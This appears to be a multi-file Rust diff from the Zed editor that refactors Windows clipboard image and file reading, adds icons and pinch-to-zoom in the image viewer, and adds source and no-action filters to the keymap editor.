+ let (bytes, image_format) = if format == CF_DIB.0 as u32 {
+ (convert_dib_to_bmp(locked.as_bytes())?, ImageFormat::Bmp)
+ } else {
+ let image_format = *IMAGE_FORMATS_MAP.get(&format)?;
+ (locked.as_bytes().to_vec(), image_format)
+ };
+ let id = hash(&bytes);
+ Some(ClipboardEntry::Image(Image {
+ format: image_format,
+ bytes,
+ id,
+ }))
}
-fn read_image_from_clipboard(format: u32) -> Option<ClipboardEntry> {
- // Handle CF_DIB format specially - it's raw bitmap data that needs conversion
- if format == CF_DIB.0 as u32 {
- return read_image_for_type(format, ImageFormat::Bmp, Some(convert_dib_to_bmp));
- }
- let image_format = format_number_to_image_format(format)?;
- read_image_for_type::<fn(&[u8]) -> Option<Vec<u8>>>(format, *image_format, None)
+fn read_files() -> Option<ClipboardEntry> {
+ let locked = get_clipboard_data(CF_HDROP.0 as u32)?;
+ let hdrop = HDROP(locked.ptr as *mut _);
+ let mut filenames = Vec::new();
+ with_file_names(hdrop, |name| filenames.push(std::path::PathBuf::from(name)));
+ Some(ClipboardEntry::ExternalPaths(ExternalPaths(
+ filenames.into(),
+ )))
}
-/// Convert DIB data to BMP file format.
-/// DIB is essentially BMP without a file header, so we just need to add the 14-byte BITMAPFILEHEADER.
-fn convert_dib_to_bmp(dib_data: &[u8]) -> Option<Vec<u8>> {
- if dib_data.len() < 40 {
+/// DIB is BMP without the 14-byte BITMAPFILEHEADER. Prepend one.
+fn convert_dib_to_bmp(dib: &[u8]) -> Option<Vec<u8>> {
+ if dib.len() < 40 {
return None;
}
- let file_size = 14 + dib_data.len() as u32;
- // Calculate pixel data offset
- let header_size = u32::from_le_bytes(dib_data[0..4].try_into().ok()?);
- let bit_count = u16::from_le_bytes(dib_data[14..16].try_into().ok()?);
- let compression = u32::from_le_bytes(dib_data[16..20].try_into().ok()?);
+ let header_size = u32::from_le_bytes(dib[0..4].try_into().ok()?);
+ let bit_count = u16::from_le_bytes(dib[14..16].try_into().ok()?);
+ let compression = u32::from_le_bytes(dib[16..20].try_into().ok()?);
- // Calculate color table size
let color_table_size = if bit_count <= 8 {
- let colors_used = u32::from_le_bytes(dib_data[32..36].try_into().ok()?);
- let num_colors = if colors_used == 0 {
+ let colors_used = u32::from_le_bytes(dib[32..36].try_into().ok()?);
+ (if colors_used == 0 {
1u32 << bit_count
} else {
colors_used
- };
- num_colors * 4
+ }) * 4
} else if compression == 3 {
12 // BI_BITFIELDS
} else {
0
};
- let pixel_data_offset = 14 + header_size + color_table_size;
+ let pixel_offset = 14 + header_size + color_table_size;
+ let file_size = 14 + dib.len() as u32;
- // Build BITMAPFILEHEADER (14 bytes)
- let mut bmp_data = Vec::with_capacity(file_size as usize);
- bmp_data.extend_from_slice(b"BM"); // Signature
- bmp_data.extend_from_slice(&file_size.to_le_bytes()); // File size
- bmp_data.extend_from_slice(&[0u8; 4]); // Reserved
- bmp_data.extend_from_slice(&pixel_data_offset.to_le_bytes()); // Pixel data offset
- bmp_data.extend_from_slice(dib_data); // DIB data
+ let mut bmp = Vec::with_capacity(file_size as usize);
+ bmp.extend_from_slice(b"BM");
+ bmp.extend_from_slice(&file_size.to_le_bytes());
+ bmp.extend_from_slice(&[0u8; 4]); // reserved
+ bmp.extend_from_slice(&pixel_offset.to_le_bytes());
+ bmp.extend_from_slice(dib);
+ Some(bmp)
+}
- Some(bmp_data)
+fn log_unsupported_clipboard_formats() {
+ let count = unsafe { CountClipboardFormats() };
+ let mut format = 0;
+ for _ in 0..count {
+ format = unsafe { EnumClipboardFormats(format) };
+ let mut buffer = [0u16; 64];
+ unsafe { GetClipboardFormatNameW(format, &mut buffer) };
+ let format_name = String::from_utf16_lossy(&buffer);
+ log::warn!(
+ "Try to paste with unsupported clipboard format: {}, {}.",
+ format,
+ format_name
+ );
+ }
}
-#[inline]
-fn format_number_to_image_format(format_number: u32) -> Option<&'static ImageFormat> {
- IMAGE_FORMATS_MAP.get(&format_number)
+fn gpui_to_image_format(value: ImageFormat) -> Option<image::ImageFormat> {
+ match value {
+ ImageFormat::Png => Some(image::ImageFormat::Png),
+ ImageFormat::Jpeg => Some(image::ImageFormat::Jpeg),
+ ImageFormat::Webp => Some(image::ImageFormat::WebP),
+ ImageFormat::Gif => Some(image::ImageFormat::Gif),
+ ImageFormat::Bmp => Some(image::ImageFormat::Bmp),
+ ImageFormat::Tiff => Some(image::ImageFormat::Tiff),
+ other => {
+ log::warn!("No image crate equivalent for format: {other:?}");
+ None
+ }
+ }
}
-fn read_image_for_type<F>(
- format_number: u32,
- format: ImageFormat,
- convert: Option<F>,
-) -> Option<ClipboardEntry>
-where
- F: FnOnce(&[u8]) -> Option<Vec<u8>>,
-{
- let (bytes, id) = with_clipboard_data(format_number, |data_ptr, size| {
- let raw_bytes = unsafe { std::slice::from_raw_parts(data_ptr as *const u8, size) };
- let bytes = match convert {
- Some(converter) => converter(raw_bytes)?,
- None => raw_bytes.to_vec(),
- };
- let id = hash(&bytes);
- Some((bytes, id))
- })??;
- Some(ClipboardEntry::Image(Image { format, bytes, id }))
+struct ClipboardGuard;
+
+impl ClipboardGuard {
+ fn open() -> Option<Self> {
+ match unsafe { OpenClipboard(None) } {
+ Ok(()) => Some(Self),
+ Err(e) => {
+ log::error!("Failed to open clipboard: {e}");
+ None
+ }
+ }
+ }
}
-fn read_files_from_clipboard() -> Option<ClipboardEntry> {
- let filenames = with_clipboard_data(CF_HDROP.0 as u32, |data_ptr, _size| {
- let hdrop = HDROP(data_ptr);
- let mut filenames = Vec::new();
- with_file_names(hdrop, |file_name| {
- filenames.push(std::path::PathBuf::from(file_name));
- });
- filenames
- })?;
- Some(ClipboardEntry::ExternalPaths(ExternalPaths(
- filenames.into(),
- )))
+impl Drop for ClipboardGuard {
+ fn drop(&mut self) {
+ if let Err(e) = unsafe { CloseClipboard() } {
+ log::error!("Failed to close clipboard: {e}");
+ }
+ }
}
-fn with_clipboard_data<F, R>(format: u32, f: F) -> Option<R>
-where
- F: FnOnce(*mut std::ffi::c_void, usize) -> R,
-{
- let global = HGLOBAL(unsafe { GetClipboardData(format).ok() }?.0);
- let size = unsafe { GlobalSize(global) };
- let data_ptr = unsafe { GlobalLock(global) };
- let result = f(data_ptr, size);
- unsafe { GlobalUnlock(global).ok() };
- Some(result)
+struct LockedGlobal {
+ global: HGLOBAL,
+ ptr: *const u8,
+ size: usize,
}
-fn gpui_image_format_to_image(value: ImageFormat) -> image::ImageFormat {
- match value {
- ImageFormat::Png => image::ImageFormat::Png,
- ImageFormat::Jpeg => image::ImageFormat::Jpeg,
- ImageFormat::Webp => image::ImageFormat::WebP,
- ImageFormat::Gif => image::ImageFormat::Gif,
- // TODO: ImageFormat::Svg
- ImageFormat::Bmp => image::ImageFormat::Bmp,
- ImageFormat::Tiff => image::ImageFormat::Tiff,
- _ => unreachable!(),
+impl LockedGlobal {
+ fn lock(global: HGLOBAL) -> Option<Self> {
+ let size = unsafe { GlobalSize(global) };
+ let ptr = unsafe { GlobalLock(global) };
+ if ptr.is_null() {
+ return None;
+ }
+ Some(Self {
+ global,
+ ptr: ptr as *const u8,
+ size,
+ })
+ }
+
+ fn as_bytes(&self) -> &[u8] {
+ unsafe { std::slice::from_raw_parts(self.ptr, self.size) }
+ }
+}
+
+impl Drop for LockedGlobal {
+ fn drop(&mut self) {
+ unsafe { GlobalUnlock(self.global).ok() };
}
}
@@ -155,6 +155,7 @@ async fn cleanup_staging_path(staging_path: &Path, asset_kind: AssetKind) {
}
async fn finalize_download(staging_path: &Path, destination_path: &Path) -> Result<()> {
+ _ = async_fs::remove_dir_all(destination_path).await;
async_fs::rename(staging_path, destination_path)
.await
.with_context(|| format!("renaming {staging_path:?} to {destination_path:?}"))?;
@@ -22,11 +22,13 @@ pub enum IconName {
AiOllama,
AiOpenAi,
AiOpenAiCompat,
+ AiOpenCode,
AiOpenRouter,
AiVercel,
AiVZero,
AiXAi,
AiZed,
+ Archive,
ArrowCircle,
ArrowDown,
ArrowDown10,
@@ -113,6 +115,7 @@ pub enum IconName {
ExpandUp,
ExpandVertical,
Eye,
+ EyeOff,
FastForward,
FastForwardOff,
File,
@@ -130,8 +133,10 @@ pub enum IconName {
FileTree,
Filter,
Flame,
+ Focus,
Folder,
FolderOpen,
+ FolderPlus,
FolderSearch,
Font,
FontSize,
@@ -147,6 +152,8 @@ pub enum IconName {
GitBranchPlus,
GitCommit,
GitGraph,
+ GitMergeConflict,
+ GitWorktree,
Github,
Hash,
HistoryRerun,
@@ -215,6 +222,9 @@ pub enum IconName {
Settings,
ShieldCheck,
Shift,
+ SignalHigh,
+ SignalLow,
+ SignalMedium,
Slash,
Sliders,
Space,
@@ -243,6 +253,10 @@ pub enum IconName {
ThinkingModeOff,
Thread,
ThreadFromSummary,
+ ThreadsSidebarLeftClosed,
+ ThreadsSidebarLeftOpen,
+ ThreadsSidebarRightClosed,
+ ThreadsSidebarRightOpen,
ThumbsDown,
ThumbsUp,
TodoComplete,
@@ -271,8 +285,6 @@ pub enum IconName {
UserRoundPen,
Warning,
WholeWord,
- WorkspaceNavClosed,
- WorkspaceNavOpen,
XCircle,
XCircleFilled,
ZedAgent,
@@ -6,15 +6,17 @@ use std::path::Path;
use anyhow::Context as _;
use editor::{EditorSettings, items::entry_git_aware_label_color};
use file_icons::FileIcons;
+#[cfg(any(target_os = "linux", target_os = "macos"))]
+use gpui::PinchEvent;
use gpui::{
AnyElement, App, Bounds, Context, DispatchPhase, Element, ElementId, Entity, EventEmitter,
- FocusHandle, Focusable, GlobalElementId, InspectorElementId, InteractiveElement, IntoElement,
- LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, Pixels,
- Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task, WeakEntity, Window, actions,
- checkerboard, div, img, point, px, size,
+ FocusHandle, Focusable, Font, GlobalElementId, InspectorElementId, InteractiveElement,
+ IntoElement, LayoutId, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent,
+ ParentElement, Pixels, Point, Render, ScrollDelta, ScrollWheelEvent, Style, Styled, Task,
+ WeakEntity, Window, actions, checkerboard, div, img, point, px, size,
};
use language::File as _;
-use persistence::IMAGE_VIEWER;
+use persistence::ImageViewerDb;
use project::{ImageItem, Project, ProjectPath, image_store::ImageItemEvent};
use settings::Settings;
use theme::ThemeSettings;
@@ -24,7 +26,7 @@ use workspace::{
ItemId, ItemSettings, Pane, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace,
WorkspaceId, delete_unloaded_items,
invalid_item_view::InvalidItemView,
- item::{BreadcrumbText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams},
+ item::{HighlightedText, Item, ItemHandle, ProjectItem, SerializableItem, TabContentParams},
};
pub use crate::image_info::*;
@@ -260,6 +262,12 @@ impl ImageView {
cx.notify();
}
}
+
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ fn handle_pinch(&mut self, event: &PinchEvent, _window: &mut Window, cx: &mut Context<Self>) {
+ let zoom_factor = 1.0 + event.delta;
+ self.set_zoom(self.zoom_level * zoom_factor, Some(event.position), cx);
+ }
}
struct ImageContentElement {
@@ -522,15 +530,17 @@ impl Item for ImageView {
}
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
let text = breadcrumbs_text_for_image(self.project.read(cx), self.image_item.read(cx), cx);
- let settings = ThemeSettings::get_global(cx);
+ let font = ThemeSettings::get_global(cx).buffer_font.clone();
- Some(vec![BreadcrumbText {
- text,
- highlights: None,
- font: Some(settings.buffer_font.clone()),
- }])
+ Some((
+ vec![HighlightedText {
+ text: text.into(),
+ highlights: vec![],
+ }],
+ Some(font),
+ ))
}
fn can_split(&self) -> bool {
@@ -590,8 +600,9 @@ impl SerializableItem for ImageView {
window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<Entity<Self>>> {
+ let db = ImageViewerDb::global(cx);
window.spawn(cx, async move |cx| {
- let image_path = IMAGE_VIEWER
+ let image_path = db
.get_image_path(item_id, workspace_id)?
.context("No image path found")?;
@@ -624,13 +635,8 @@ impl SerializableItem for ImageView {
_window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<()>> {
- delete_unloaded_items(
- alive_items,
- workspace_id,
- "image_viewers",
- &IMAGE_VIEWER,
- cx,
- )
+ let db = ImageViewerDb::global(cx);
+ delete_unloaded_items(alive_items, workspace_id, "image_viewers", &db, cx)
}
fn serialize(
@@ -644,12 +650,11 @@ impl SerializableItem for ImageView {
let workspace_id = workspace.database_id()?;
let image_path = self.image_item.read(cx).abs_path(cx)?;
+ let db = ImageViewerDb::global(cx);
Some(cx.background_spawn({
async move {
log::debug!("Saving image at path {image_path:?}");
- IMAGE_VIEWER
- .save_image_path(item_id, workspace_id, image_path)
- .await
+ db.save_image_path(item_id, workspace_id, image_path).await
}
}))
}
@@ -679,8 +684,9 @@ impl Render for ImageView {
.size_full()
.relative()
.bg(cx.theme().colors().editor_background)
- .child(
- div()
+ .child({
+ #[cfg(any(target_os = "linux", target_os = "macos"))]
+ let container = div()
.id("image-container")
.size_full()
.overflow_hidden()
@@ -690,13 +696,34 @@ impl Render for ImageView {
gpui::CursorStyle::OpenHand
})
.on_scroll_wheel(cx.listener(Self::handle_scroll_wheel))
+ .on_pinch(cx.listener(Self::handle_pinch))
.on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down))
.on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down))
.on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up))
.on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up))
.on_mouse_move(cx.listener(Self::handle_mouse_move))
- .child(ImageContentElement::new(cx.entity())),
- )
+ .child(ImageContentElement::new(cx.entity()));
+
+ #[cfg(not(any(target_os = "linux", target_os = "macos")))]
+ let container = div()
+ .id("image-container")
+ .size_full()
+ .overflow_hidden()
+ .cursor(if self.is_dragging() {
+ gpui::CursorStyle::ClosedHand
+ } else {
+ gpui::CursorStyle::OpenHand
+ })
+ .on_scroll_wheel(cx.listener(Self::handle_scroll_wheel))
+ .on_mouse_down(MouseButton::Left, cx.listener(Self::handle_mouse_down))
+ .on_mouse_down(MouseButton::Middle, cx.listener(Self::handle_mouse_down))
+ .on_mouse_up(MouseButton::Left, cx.listener(Self::handle_mouse_up))
+ .on_mouse_up(MouseButton::Middle, cx.listener(Self::handle_mouse_up))
+ .on_mouse_move(cx.listener(Self::handle_mouse_move))
+ .child(ImageContentElement::new(cx.entity()));
+
+ container
+ })
}
}
@@ -878,7 +905,7 @@ mod persistence {
)];
}
- db::static_connection!(IMAGE_VIEWER, ImageViewerDb, [WorkspaceDb]);
+ db::static_connection!(ImageViewerDb, [WorkspaceDb]);
impl ImageViewerDb {
query! {
@@ -9,7 +9,7 @@ use std::{
path::{Path, PathBuf},
sync::Arc,
};
-use workspace::{AppState, OpenVisible, Workspace};
+use workspace::{AppState, OpenResult, OpenVisible, Workspace};
actions!(
journal,
@@ -107,7 +107,10 @@ pub fn new_journal_entry(workspace: &Workspace, window: &mut Window, cx: &mut Ap
.spawn(cx, async move |cx| {
let (journal_dir, entry_path) = create_entry.await?;
let opened = if open_new_workspace {
- let (new_workspace, _) = cx
+ let OpenResult {
+ window: new_workspace,
+ ..
+ } = cx
.update(|_window, cx| {
workspace::open_paths(
&[journal_dir],
@@ -30,8 +30,8 @@ use settings::{
BaseKeymap, KeybindSource, KeymapFile, Settings as _, SettingsAssets, infer_json_indent_size,
};
use ui::{
- ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, Indicator,
- Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section,
+ ActiveTheme as _, App, Banner, BorrowAppContext, ContextMenu, IconButtonShape, IconPosition,
+ Indicator, Modal, ModalFooter, ModalHeader, ParentElement as _, PopoverMenu, Render, Section,
SharedString, Styled as _, Table, TableColumnWidths, TableInteractionState,
TableResizeBehavior, Tooltip, Window, prelude::*,
};
@@ -39,7 +39,7 @@ use ui_input::InputField;
use util::ResultExt;
use workspace::{
Item, ModalView, SerializableItem, Workspace, notifications::NotifyTaskExt as _,
- register_serializable_item,
+ register_serializable_item, with_active_or_new_workspace,
};
pub use ui_components::*;
@@ -47,7 +47,7 @@ use zed_actions::{ChangeKeybinding, OpenKeymap};
use crate::{
action_completion_provider::ActionCompletionProvider,
- persistence::KEYBINDING_EDITORS,
+ persistence::KeybindingEditorDb,
ui_components::keystroke_input::{
ClearKeystrokes, KeystrokeInput, StartRecording, StopRecording,
},
@@ -73,6 +73,8 @@ actions!(
CopyContext,
/// Toggles Conflict Filtering
ToggleConflictFilter,
+ /// Toggles whether NoAction bindings are shown
+ ToggleNoActionBindings,
/// Toggle Keystroke search
ToggleKeystrokeSearch,
/// Toggles exact matching for keystroke search
@@ -126,14 +128,16 @@ pub fn init(cx: &mut App) {
}
}
+ cx.on_action(|_: &OpenKeymap, cx| {
+ with_active_or_new_workspace(cx, |workspace, window, cx| {
+ open_keymap_editor(None, workspace, window, cx);
+ });
+ });
+
cx.observe_new(|workspace: &mut Workspace, _window, _cx| {
- workspace
- .register_action(|workspace, _: &OpenKeymap, window, cx| {
- open_keymap_editor(None, workspace, window, cx);
- })
- .register_action(|workspace, action: &ChangeKeybinding, window, cx| {
- open_keymap_editor(Some(action.action.clone()), workspace, window, cx);
- });
+ workspace.register_action(|workspace, action: &ChangeKeybinding, window, cx| {
+ open_keymap_editor(Some(action.action.clone()), workspace, window, cx);
+ });
})
.detach();
@@ -183,7 +187,7 @@ impl KeymapEventChannel {
}
}
-#[derive(Default, PartialEq)]
+#[derive(Default, PartialEq, Copy, Clone)]
enum SearchMode {
#[default]
Normal,
@@ -224,6 +228,25 @@ impl FilterState {
}
}
+#[derive(Default, PartialEq, Eq, Copy, Clone)]
+struct SourceFilters {
+ user: bool,
+ zed_defaults: bool,
+ vim_defaults: bool,
+}
+
+impl SourceFilters {
+ fn allows(&self, source: Option<KeybindSource>) -> bool {
+ match source {
+ Some(KeybindSource::User) => self.user,
+ Some(KeybindSource::Vim) => self.vim_defaults,
+ Some(KeybindSource::Base | KeybindSource::Default | KeybindSource::Unknown) | None => {
+ self.zed_defaults
+ }
+ }
+ }
+}
+
#[derive(Debug, Default, PartialEq, Eq, Clone, Hash)]
struct ActionMapping {
keystrokes: Rc<[KeybindingKeystroke]>,
@@ -412,6 +435,8 @@ struct KeymapEditor {
keybindings: Vec<ProcessedBinding>,
keybinding_conflict_state: ConflictState,
filter_state: FilterState,
+ source_filters: SourceFilters,
+ show_no_action_bindings: bool,
search_mode: SearchMode,
search_query_debounce: Option<Task<()>>,
// corresponds 1 to 1 with keybindings
@@ -477,6 +502,40 @@ fn keystrokes_match_exactly(
})
}
+fn disabled_binding_matches_context(
+ disabled_binding: &gpui::KeyBinding,
+ binding: &gpui::KeyBinding,
+) -> bool {
+ match (
+ disabled_binding.predicate().as_deref(),
+ binding.predicate().as_deref(),
+ ) {
+ (None, _) => true,
+ (Some(_), None) => false,
+ (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate),
+ }
+}
+
+fn binding_is_unbound_by_unbind(
+ binding: &gpui::KeyBinding,
+ binding_index: usize,
+ all_bindings: &[&gpui::KeyBinding],
+) -> bool {
+ all_bindings[binding_index + 1..]
+ .iter()
+ .rev()
+ .any(|disabled_binding| {
+ gpui::is_unbind(disabled_binding.action())
+ && keystrokes_match_exactly(disabled_binding.keystrokes(), binding.keystrokes())
+ && disabled_binding
+ .action()
+ .as_any()
+ .downcast_ref::<gpui::Unbind>()
+ .is_some_and(|unbind| unbind.0.as_ref() == binding.action().name())
+ && disabled_binding_matches_context(disabled_binding, binding)
+ })
+}
+
impl KeymapEditor {
fn new(workspace: WeakEntity<Workspace>, window: &mut Window, cx: &mut Context<Self>) -> Self {
let _keymap_subscription =
@@ -539,6 +598,12 @@ impl KeymapEditor {
keybindings: vec![],
keybinding_conflict_state: ConflictState::default(),
filter_state: FilterState::default(),
+ source_filters: SourceFilters {
+ user: true,
+ zed_defaults: true,
+ vim_defaults: true,
+ },
+ show_no_action_bindings: true,
search_mode: SearchMode::default(),
string_match_candidates: Arc::new(vec![]),
matches: vec![],
@@ -637,6 +702,11 @@ impl KeymapEditor {
)
.await;
this.update(cx, |this, cx| {
+ matches.retain(|candidate| {
+ this.source_filters
+ .allows(this.keybindings[candidate.candidate_id].keybind_source())
+ });
+
match this.filter_state {
FilterState::Conflicts => {
matches.retain(|candidate| {
@@ -695,6 +765,10 @@ impl KeymapEditor {
SearchMode::Normal => {}
}
+ if !this.show_no_action_bindings {
+ matches.retain(|item| !this.keybindings[item.candidate_id].is_no_action());
+ }
+
if action_query.is_empty() {
matches.sort_by(|item1, item2| {
let binding1 = &this.keybindings[item1.candidate_id];
@@ -729,7 +803,7 @@ impl KeymapEditor {
) {
let key_bindings_ptr = cx.key_bindings();
let lock = key_bindings_ptr.borrow();
- let key_bindings = lock.bindings();
+ let key_bindings = lock.bindings().collect::<Vec<_>>();
let mut unmapped_action_names = HashSet::from_iter(cx.all_action_names().iter().copied());
let action_documentation = cx.action_documentation();
let mut generator = KeymapFile::action_schema_generator();
@@ -742,13 +816,20 @@ impl KeymapEditor {
let mut processed_bindings = Vec::new();
let mut string_match_candidates = Vec::new();
- for key_binding in key_bindings {
+ for (binding_index, &key_binding) in key_bindings.iter().enumerate() {
+ if gpui::is_unbind(key_binding.action()) {
+ continue;
+ }
+
let source = key_binding
.meta()
.map(KeybindSource::from_meta)
.unwrap_or(KeybindSource::Unknown);
let keystroke_text = ui::text_for_keybinding_keystrokes(key_binding.keystrokes(), cx);
+ let is_no_action = gpui::is_no_action(key_binding.action());
+ let is_unbound_by_unbind =
+ binding_is_unbound_by_unbind(key_binding, binding_index, &key_bindings);
let binding = KeyBinding::new(key_binding, source);
let context = key_binding
@@ -783,6 +864,8 @@ impl KeymapEditor {
binding,
context,
source,
+ is_no_action,
+ is_unbound_by_unbind,
action_information,
));
string_match_candidates.push(string_match_candidate);
@@ -976,20 +1059,23 @@ impl KeymapEditor {
.and_then(KeybindContextString::local)
.is_none();
- let selected_binding_is_unbound = selected_binding.is_unbound();
+ let selected_binding_is_unmapped = selected_binding.is_unbound();
+ let selected_binding_is_suppressed = selected_binding.is_unbound_by_unbind();
+ let selected_binding_is_non_interactable =
+ selected_binding_is_unmapped || selected_binding_is_suppressed;
let context_menu = ContextMenu::build(window, cx, |menu, _window, _cx| {
menu.context(self.focus_handle.clone())
- .when(selected_binding_is_unbound, |this| {
+ .when(selected_binding_is_unmapped, |this| {
this.action("Create", Box::new(CreateBinding))
})
.action_disabled_when(
- selected_binding_is_unbound,
+ selected_binding_is_non_interactable,
"Edit",
Box::new(EditBinding),
)
.action_disabled_when(
- selected_binding_is_unbound,
+ selected_binding_is_non_interactable,
"Delete",
Box::new(DeleteBinding),
)
@@ -1037,9 +1123,15 @@ impl KeymapEditor {
&self,
index: usize,
conflict: Option<ConflictOrigin>,
+ is_unbound_by_unbind: bool,
cx: &mut Context<Self>,
) -> IconButton {
- if self.filter_state != FilterState::Conflicts
+ if is_unbound_by_unbind {
+ base_button_style(index, IconName::Warning)
+ .icon_color(Color::Warning)
+ .disabled(true)
+ .tooltip(Tooltip::text("This action is unbound"))
+ } else if self.filter_state != FilterState::Conflicts
&& let Some(conflict) = conflict
{
if conflict.is_user_keybind_conflict() {
@@ -1199,6 +1291,9 @@ impl KeymapEditor {
let Some((keybind, keybind_index)) = self.selected_keybind_and_index() else {
return;
};
+ if !create && keybind.is_unbound_by_unbind() {
+ return;
+ }
let keybind = keybind.clone();
let keymap_editor = cx.entity();
@@ -1305,6 +1400,9 @@ impl KeymapEditor {
let Some(to_remove) = self.selected_binding().cloned() else {
return;
};
+ if to_remove.is_unbound_by_unbind() {
+ return;
+ }
let std::result::Result::Ok(fs) = self
.workspace
@@ -1367,6 +1465,31 @@ impl KeymapEditor {
self.set_filter_state(self.filter_state.invert(), cx);
}
+ fn toggle_no_action_bindings(
+ &mut self,
+ _: &ToggleNoActionBindings,
+ _: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ self.show_no_action_bindings = !self.show_no_action_bindings;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_user_bindings_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.user = !self.source_filters.user;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_zed_defaults_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.zed_defaults = !self.source_filters.zed_defaults;
+ self.on_query_changed(cx);
+ }
+
+ fn toggle_vim_defaults_filter(&mut self, cx: &mut Context<Self>) {
+ self.source_filters.vim_defaults = !self.source_filters.vim_defaults;
+ self.on_query_changed(cx);
+ }
+
fn set_filter_state(&mut self, filter_state: FilterState, cx: &mut Context<Self>) {
if self.filter_state != filter_state {
self.filter_state = filter_state;
@@ -1442,6 +1565,127 @@ impl KeymapEditor {
.filter(|kb| kb.keystrokes().is_some())
.any(|kb| kb.action().name == action_name)
}
+
+ fn render_filter_dropdown(
+ &self,
+ focus_handle: &FocusHandle,
+ cx: &mut Context<KeymapEditor>,
+ ) -> impl IntoElement {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = cx.entity();
+ return PopoverMenu::new("keymap-editor-filter-menu")
+ .menu(move |window, cx| {
+ Some(ContextMenu::build_persistent(window, cx, {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = keymap_editor.clone();
+ move |mut menu, _window, cx| {
+ let (filter_state, source_filters, show_no_action_bindings) = keymap_editor
+ .read_with(cx, |editor, _| {
+ (
+ editor.filter_state,
+ editor.source_filters,
+ editor.show_no_action_bindings,
+ )
+ });
+
+ menu = menu
+ .context(focus_handle.clone())
+ .header("Filters")
+ .map(add_filter(
+ "Conflicts",
+ matches!(filter_state, FilterState::Conflicts),
+ Some(ToggleConflictFilter.boxed_clone()),
+ &focus_handle,
+ &keymap_editor,
+ None,
+ ))
+ .map(add_filter(
+ "No Action",
+ show_no_action_bindings,
+ Some(ToggleNoActionBindings.boxed_clone()),
+ &focus_handle,
+ &keymap_editor,
+ None,
+ ))
+ .separator()
+ .header("Categories")
+ .map(add_filter(
+ "User",
+ source_filters.user,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_user_bindings_filter(cx);
+ }),
+ ))
+ .map(add_filter(
+ "Default",
+ source_filters.zed_defaults,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_zed_defaults_filter(cx);
+ }),
+ ))
+ .map(add_filter(
+ "Vim",
+ source_filters.vim_defaults,
+ None,
+ &focus_handle,
+ &keymap_editor,
+ Some(|editor, cx| {
+ editor.toggle_vim_defaults_filter(cx);
+ }),
+ ));
+ menu
+ }
+ }))
+ })
+ .anchor(gpui::Corner::TopRight)
+ .offset(gpui::Point {
+ x: px(0.0),
+ y: px(2.0),
+ })
+ .trigger_with_tooltip(
+ IconButton::new("KeymapEditorFilterMenuButton", IconName::Sliders)
+ .icon_size(IconSize::Small)
+ .when(
+ self.keybinding_conflict_state.any_user_binding_conflicts(),
+ |this| this.indicator(Indicator::dot().color(Color::Warning)),
+ ),
+ Tooltip::text("Filters"),
+ );
+
+ fn add_filter(
+ name: &'static str,
+ toggled: bool,
+ action: Option<Box<dyn Action>>,
+ focus_handle: &FocusHandle,
+ keymap_editor: &Entity<KeymapEditor>,
+ cb: Option<fn(&mut KeymapEditor, &mut Context<KeymapEditor>)>,
+ ) -> impl FnOnce(ContextMenu) -> ContextMenu {
+ let focus_handle = focus_handle.clone();
+ let keymap_editor = keymap_editor.clone();
+ return move |menu: ContextMenu| {
+ menu.toggleable_entry(
+ name,
+ toggled,
+ IconPosition::End,
+ action.as_ref().map(|a| a.boxed_clone()),
+ move |window, cx| {
+ window.focus(&focus_handle, cx);
+ if let Some(action) = &action {
+ window.dispatch_action(action.boxed_clone(), cx);
+ } else if let Some(cb) = cb {
+ keymap_editor.update(cx, cb);
+ }
+ },
+ )
+ };
+ }
+ }
}
struct HumanizedActionNameCache {
@@ -1488,6 +1732,8 @@ struct KeybindInformation {
binding: KeyBinding,
context: KeybindContextString,
source: KeybindSource,
+ is_no_action: bool,
+ is_unbound_by_unbind: bool,
}
impl KeybindInformation {
@@ -1538,6 +1784,8 @@ impl ProcessedBinding {
binding: KeyBinding,
context: KeybindContextString,
source: KeybindSource,
+ is_no_action: bool,
+ is_unbound_by_unbind: bool,
action_information: ActionInformation,
) -> Self {
Self::Mapped(
@@ -1546,6 +1794,8 @@ impl ProcessedBinding {
binding,
context,
source,
+ is_no_action,
+ is_unbound_by_unbind,
},
action_information,
)
@@ -1584,6 +1834,16 @@ impl ProcessedBinding {
self.keybind_information().map(|keybind| &keybind.binding)
}
+ fn is_no_action(&self) -> bool {
+ self.keybind_information()
+ .is_some_and(|keybind| keybind.is_no_action)
+ }
+
+ fn is_unbound_by_unbind(&self) -> bool {
+ self.keybind_information()
+ .is_some_and(|keybind| keybind.is_unbound_by_unbind)
+ }
+
fn keystroke_text(&self) -> Option<&SharedString> {
self.keybind_information()
.map(|binding| &binding.keystroke_text)
@@ -1694,6 +1954,7 @@ impl Render for KeymapEditor {
let row_count = self.matches.len();
let focus_handle = &self.focus_handle;
let theme = cx.theme();
+ let search_mode = self.search_mode;
v_flex()
.id("keymap-editor")
@@ -1711,6 +1972,7 @@ impl Render for KeymapEditor {
.on_action(cx.listener(Self::copy_action_to_clipboard))
.on_action(cx.listener(Self::copy_context_to_clipboard))
